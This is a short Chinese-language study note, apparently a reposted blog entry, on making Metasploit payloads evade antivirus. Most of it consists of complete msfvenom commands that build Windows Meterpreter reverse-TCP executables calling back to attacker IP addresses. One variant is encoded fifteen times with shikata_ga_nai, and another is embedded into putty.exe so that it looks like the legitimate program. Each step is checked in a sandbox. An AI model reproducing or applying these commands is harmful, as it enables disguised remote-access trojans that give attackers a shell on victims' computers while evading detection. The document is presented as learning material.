远控免杀学习笔记-msfvenom自带免杀

未处理的payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o payload1.exe

远控免杀学习笔记-msfvenom自带免杀_第1张图片

生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下

远控免杀学习笔记-msfvenom自带免杀_第2张图片

 msf⾃编码处理

使⽤ msfvenom --list encoders 可查看所有编码器

msfvenom --list encoders

msfvenom -p windows/meterpreter/reverse_tcp LHOST=101.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o payload2.exe

远控免杀学习笔记-msfvenom自带免杀_第3张图片跑一下沙箱看看

远控免杀学习笔记-msfvenom自带免杀_第4张图片msf⾃捆绑免杀

在⽣成payload时可以使⽤捆绑功能,使⽤msfvenom的 -x 参数可以指定⼀个⾃定义的可执⾏⽂件作为模板,并将payload嵌⼊其中, -x 后 ⾯跟对应⽂件路径就可以。

注意:不是所有的软件都能进行捆绑操作的,最好是使用未加壳的软件,进程捆绑操作。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe

远控免杀学习笔记-msfvenom自带免杀_第5张图片

生成的文件和原来的文件对比一下,发现完全一样 

 跑一下沙箱看看

远控免杀学习笔记-msfvenom自带免杀_第6张图片

你可能感兴趣的:(远控免杀,学习)